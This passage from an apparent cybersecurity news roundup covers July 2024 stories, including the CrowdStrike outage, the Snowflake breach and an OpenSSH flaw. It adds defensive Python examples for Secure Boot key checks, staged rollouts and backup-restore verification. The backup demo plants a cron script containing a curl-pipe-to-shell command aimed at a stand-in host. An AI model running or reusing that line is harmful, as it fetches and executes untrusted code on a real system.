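# Added example: look for the untrusted test Platform Key markers in the live
# PK variable. Assumes Linux with efivarfs at /sys/firmware/efi/efivars.
import re
from pathlib import Path

# PK variable under the EFI_GLOBAL_VARIABLE GUID, as exposed by efivarfs.
PK_EFIVAR = Path("/sys/firmware/efi/efivars/PK-8be4df61-93ca-11d2-aa0d-00e098032b8c")

# Strings found in the subject of the test keys the page refers to.
TEST_KEY_MARKERS = (b"DO NOT TRUST", b"DO NOT SHIP")


def find_test_key_markers(blob):
    """Return the marker strings present in a raw PK blob (case-insensitive).
    The X.509 subject inside the EFI_SIGNATURE_LIST is DER-encoded and the CN is
    stored as plain printable text, so a byte search is enough for this check."""
    upper = blob.upper()
    return [m.decode() for m in TEST_KEY_MARKERS if m in upper]


def printable_strings(blob, min_len=8):
    """Best-effort list of printable ASCII runs, to show which CN/O the key carries."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def assess_pk_blob(blob):
    """Classify a raw PK blob; 'no-known-test-marker' is not a clean bill of health."""
    markers = find_test_key_markers(blob)
    return {
        "status": "untrusted-test-key" if markers else "no-known-test-marker",
        "markers": markers,
        "strings": printable_strings(blob),
    }


def check_platform_key(path=PK_EFIVAR):
    """Read the live PK. efivarfs prefixes every variable with a 4-byte attribute word."""
    if not path.exists():
        return {"status": "no-pk-variable", "markers": [], "strings": []}
    return assess_pk_blob(path.read_bytes()[4:])


if __name__ == "__main__":
    print(check_platform_key())
```

On Windows the same byte search can be run over the output of PowerShell’s Get-SecureBootUEFI -Name PK. Note that finding the marker tells you the trust chain is built on a key whose private half is not under your vendor’s control; replacing it is a firmware update from the OEM, not something a script can fix.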
July 2024 Headline News – A crazy month with more than 120 important stories
#080 Update or not? As a follow-on to the CrowdStrike/Microsoft incident, the question of automatic updates needs to be addressed. Manual or delayed software updates leave the door open for threat actors to attack the moment a fix is public. The average time to update has been a staggering 63 days. So prudent end users have a policy of testing updates before rolling them out. Interestingly, a government mandate requires PCs to be patched against an exploited vulnerability listed as CVE-2024-38112 or they will be shut down. A VMware patch for CVE-2024-37085 was reported by Microsoft as still being exploited. For larger companies the answer is clearly a staggered rollout, so that any disruption is caught before it becomes widespread. In fact, several enterprises did exactly this and were saved. At the end of July, SentinelOne was debating the frequency of updates. It should also be pointed out that good cybersecurity systems should be self-adapting: distributing newly learned threats and generating and sharing new defenses among installed systems. This does not imply the use of adaptive AI techniques.
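What “staggered rollout” means in code: an added example (mine, not from the original page, CrowdStrike or SentinelOne) of a ring-based deployment gate. The host names, ring sizes, thresholds and the three update behaviours are constructed; in a real pipeline the telemetry callback would query your endpoint management or EDR console after a soak period rather than answer instantly.

```python
# Added example: ring-based rollout with a crash-rate gate between rings.
# Everything below (hosts, thresholds, telemetry) is constructed for illustration.
from dataclasses import dataclass


@dataclass
class Ring:
    name: str
    hosts: list
    max_crash_rate: float  # fraction of the ring allowed to fail before the rollout halts


def build_rings(n_fleet=1000):
    """Canary (0.5%), early adopters (5%), then everyone else."""
    hosts = [f"host-{i:04d}" for i in range(n_fleet)]
    return [
        Ring("canary", hosts[:5], max_crash_rate=0.0),
        Ring("early", hosts[5:55], max_crash_rate=0.01),
        Ring("fleet", hosts[55:], max_crash_rate=0.01),
    ]


def staged_rollout(crashed_after_update, rings):
    """Push the update ring by ring. After each ring, read back crash telemetry
    and stop before the next ring if the rate exceeds that ring's threshold.
    crashed_after_update(host) -> True if the host failed after the update."""
    deployed, crashed, log = [], [], []
    for ring in rings:
        deployed.extend(ring.hosts)          # in production: deploy, then wait out the soak time
        ring_crashes = [h for h in ring.hosts if crashed_after_update(h)]
        crashed.extend(ring_crashes)
        rate = len(ring_crashes) / len(ring.hosts)
        log.append((ring.name, rate))
        if rate > ring.max_crash_rate:
            return {"halted_at": ring.name, "deployed": len(deployed),
                    "crashed": len(crashed), "log": log}
    return {"halted_at": None, "deployed": len(deployed),
            "crashed": len(crashed), "log": log}


# Constructed telemetry for three hypothetical updates.
def bad_update(host):
    """Boot-loops every host it lands on, like a bad kernel-mode content file."""
    return True


def flaky_update(host):
    """Crashes roughly one host in two hundred (deterministic stand-in for a rare bug)."""
    return int(host.split("-")[1]) % 200 == 199


def good_update(host):
    return False


if __name__ == "__main__":
    for name, telemetry in [("bad", bad_update), ("flaky", flaky_update), ("good", good_update)]:
        print(name, staged_rollout(telemetry, build_rings()))
```

The bad update is stopped after five machines instead of a thousand. The flaky one shows the residual risk: a defect below the ring threshold reaches the whole fleet, which is why the last ring should still be split and why the crash threshold for a kernel-level agent should be close to zero.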
#079 Insider Out The current trend of targeting cybersecurity companies took a surreal twist when security firm KnowBe4 inadvertently hired a fake IT worker who was actually working for a North Korean state-sponsored hacking operation.
#078 Meanwhile in other news …. As the world piles on to CrowdStrike for what is likely to be an important lesson for all, six other cybersecurity stories churned on in just the last 48 hours: in Los Angeles, the entire court system, which spans 36 courthouses and handles 1.2 million cases per year, is currently shut down because of a ransomware attack – that’s one way for hackers to avoid prosecution. The estimated cost of the Change Healthcare debacle has now been re-estimated at $2.3bn. The fragility of other software was shown by North Korean APT attacks on software company JumpCloud, and a privilege escalation design flaw was reported in Google’s platform. Returning to CrowdStrike, it appears that CrowdStrike’s platform is not available to smaller companies – so that’s something. Finally, Cisco managed to chalk up a rare CVSS 10.0-rated vulnerability allowing unauthenticated users to do, well, anything.
#077 Major Costly Outage caused by cybersecurity prevention. A systemic software supply chain failure (an automatic content update to CrowdStrike’s Falcon software) caused the biggest IT disaster of all time on July 18/19th. An example of software created to prevent attacks doing more damage than the attack itself: 8 million crashed Windows PCs, 26,000 affected companies, 4,000 cancelled flights and so much more. The full story is now covered at cybyr.com/hottopics. As an end-of-month update, many straightforward recovery steps were available directly from CrowdStrike, including cloud-based restarts.
#076 2 year-old AT&T story – suddenly Breaking News? The strange thing about this story is that it’s suddenly news. The question is why? It may be no coincidence that the timing of these disclosures and revelations is an attempt to ward off potential legal action, as they come on the same day that the SEC further strengthened its breach reporting regulations. Something doesn’t seem quite right here. In fact, wait … it involves problems for everyone. This seems to be a disaster. See the full coverage at cybyr.com/hottopics/. Update: It appears that this is not really an AT&T story at all, though what they did made it worse! The issue appears to stem from a breach at Snowflake, the massive cloud data and compute broker, whereby 400 of its customers had their credentials stolen. Snowflake is blaming the authentication weaknesses on its customers; those customers refute this. It does appear that infostealers penetrated a Snowflake staff account and that the credentials of 400 customer companies that did not have MFA were exfiltrated. Be that as it may, the end-user customers are not off the hook, because they did not properly delegate their responsibility – they abdicated it to Snowflake. This is not nearly the end of this and everyone is blaming everyone else! Lesson to be learned: adopt cybyr.com’s delegation methodology. Unbelievable.
#075 I’m OK, My Data is Backed Up. Time to be a bit scary. It’s touted that if we have our data backed up, and even encrypted too, then a hack can’t hurt us: even if we are breached, our data is not lost and our business won’t be disrupted. Well, a survey by Veeam (reported on its blog) revealed that 96% of attackers target data backups, 76% of victims had their backups impacted and only 20% were unaffected. Good Grief! Lesson to be learned: notwithstanding other defenses, have a Resilience Plan that backs up clean data that is encrypted and NOT online (as in there is an air gap). A critical part of the plan is to test the recovery and to verify that the recovered data is scrubbed of malware. Alternatives include cloud-based Backup as a Service (BaaS) or Disaster Recovery as a Service (DRaaS), but these need careful investigation too. (See also our notes on Asset Curation.)
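“Test the recovery” is only meaningful if the test can tell a clean restore from one an intruder has quietly altered. Here is an added example (mine, not from the original page or from Veeam) of the smallest useful version of that test: a manifest of file digests signed with an HMAC whose key lives with the offline copy, never on the production host, and a restore check that reports missing, modified and extra files. The directory contents, file names and key are constructed for the demo.

```python
# Added example: offline-verifiable backup manifest plus restore verification.
# The demo data and the HMAC key are constructed placeholders.
import hashlib
import hmac
import json
import shutil
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(backup_dir, key):
    """Digest every file under backup_dir and sign the listing with an HMAC.
    Store the manifest and key with the air-gapped copy, not beside the live data."""
    backup_dir = Path(backup_dir)
    files = {p.relative_to(backup_dir).as_posix(): sha256_file(p)
             for p in sorted(backup_dir.rglob("*")) if p.is_file()}
    body = json.dumps(files, sort_keys=True).encode()
    return {"files": files, "hmac": hmac.new(key, body, hashlib.sha256).hexdigest()}


def verify_restore(restore_dir, manifest, key):
    """Check a restored tree against the manifest. Reports files that are missing,
    modified, or extra (e.g. a dropped script the backup never contained)."""
    body = json.dumps(manifest["files"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["hmac"]):
        return {"ok": False, "problems": [("manifest-tampered", "")]}
    restore_dir = Path(restore_dir)
    problems = []
    for rel, digest in manifest["files"].items():
        p = restore_dir / rel
        if not p.is_file():
            problems.append(("missing", rel))
        elif sha256_file(p) != digest:
            problems.append(("modified", rel))
    present = {p.relative_to(restore_dir).as_posix()
               for p in restore_dir.rglob("*") if p.is_file()}
    problems += [("extra", rel) for rel in sorted(present - set(manifest["files"]))]
    return {"ok": not problems, "problems": problems}


def demo():
    """Constructed end-to-end run: back up, restore, tamper, re-verify, forge manifest."""
    key = b"offline-key-kept-with-the-air-gapped-copy"  # placeholder, not a real secret
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = Path(tmp) / "backup", Path(tmp) / "restore"
        src.mkdir()
        (src / "db.sql").write_text("CREATE TABLE users (id INT);\n")
        (src / "etc").mkdir()
        (src / "etc" / "app.conf").write_text("mode=prod\n")
        manifest = build_manifest(src, key)

        shutil.copytree(src, dst)
        clean = verify_restore(dst, manifest, key)

        # An intruder who reached the restored copy edits a config and drops a script.
        (dst / "etc" / "app.conf").write_text("mode=prod\nbackdoor=1\n")
        (dst / "cron.sh").write_text("curl http://evil.invalid | sh\n")
        tampered = verify_restore(dst, manifest, key)

        # The same intruder tries to rewrite the manifest without the key.
        forged = dict(manifest, files=dict(manifest["files"], **{"cron.sh": "00"}))
        forged_check = verify_restore(dst, forged, key)
    return clean, tampered, forged_check


if __name__ == "__main__":
    for result in demo():
        print(result)
```

This proves integrity of the restore relative to what was backed up; it does not prove the backup was clean when taken, which is why the malware scan of the restored data in the text is a separate step and why the manifest should be built from a known-good state.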
#074 The Benefits of a Cyberattack! What? Surely not! This is not actually a news item, but maybe it should be. It was an insight from Heather Hughes of AON. What was revealed is that companies that successfully defend against an attempted breach and disclose both the attempt and their dedication to security processes saw a 9% increase in their share value. This includes proper notification of such breaches and also applies to non-public companies. It is all about the implementation of resilient asset curation, training and more. The reverse is also true: loss of revenue, loss of shareholder confidence and operational delays follow from not following best practices. The lesson to be learned: following holistic cybersecurity best practices is a huge competitive business advantage.
#073 Chevron Ruling Reverberations The reverberations from the “Chevron” ruling continue. First reported in #069 below, the new ruling overturns the 1984 precedent under which courts deferred to federal agencies’ interpretation of ambiguous laws, so it seems those agencies will no longer have the same power to enforce their regulations, such as breach reporting. The jury is still out on the ramifications, but it has the potential to damage the safety of organizations and their customers. (Update: It has also – according to the Daily Scoop – put the U.S. Government’s active but fragmented cybersecurity and new AI initiatives into a state of uncertainty, since it is no longer clear if, which and how enforceable these regulations are after the Chevron ruling.) The article in #074 above brings some business motivation.
#072 Much too Open SSH Esteemed for its long-standing security, OpenSSH has been held up as the right way to write secure code. It encrypts identities, passwords and data in transit, preventing theft. Unfortunately, a recent upgrade reintroduced an old flaw, creating a vulnerability that exposes millions of Linux systems around the world. It was discovered by the Qualys Threat Research Unit, whose report reveals why and how the vulnerability occurs. One drawback of explaining how it can be breached is that it educates threat actors on how to exploit it. It might be fair to question the thoroughness of the OpenSSH project’s regression testing, but more importantly it highlights the amount of care required when upgrading such a pivotal piece of code.
#071 TeamViewer Breach A report from Cybersecurity Dive covered the breach of TeamViewer’s internal IT network through compromised employee credentials. It is attributed to the same Midnight Blizzard group that hacked into TeamViewer partner Microsoft. Although none of the 640,000 customers’ data was breached, the intrusion was either looking for employees with admin privileges that could cause further damage or planning more mischief for the company itself.
#070 New Holistic Cybersecurity Lesson The ransomware breach at Infosys McCamish Systems that occurred in November 2023 was just revealed to have impacted more than six million of its customers. The lesson is that delegation to outside consultants (like cybyr.com!) is not risk free. Not only Infosys but other firms, including those brought in to deal with ransomware(!), must also be treated with caution, and a consulting firm’s own security must be verified prior to engagement. It’s no surprise that not following the basics, like properly backing up data (as just happened in Indonesia), enables ransomware.
This page was getting too big! See Breaking News – First Half of 2024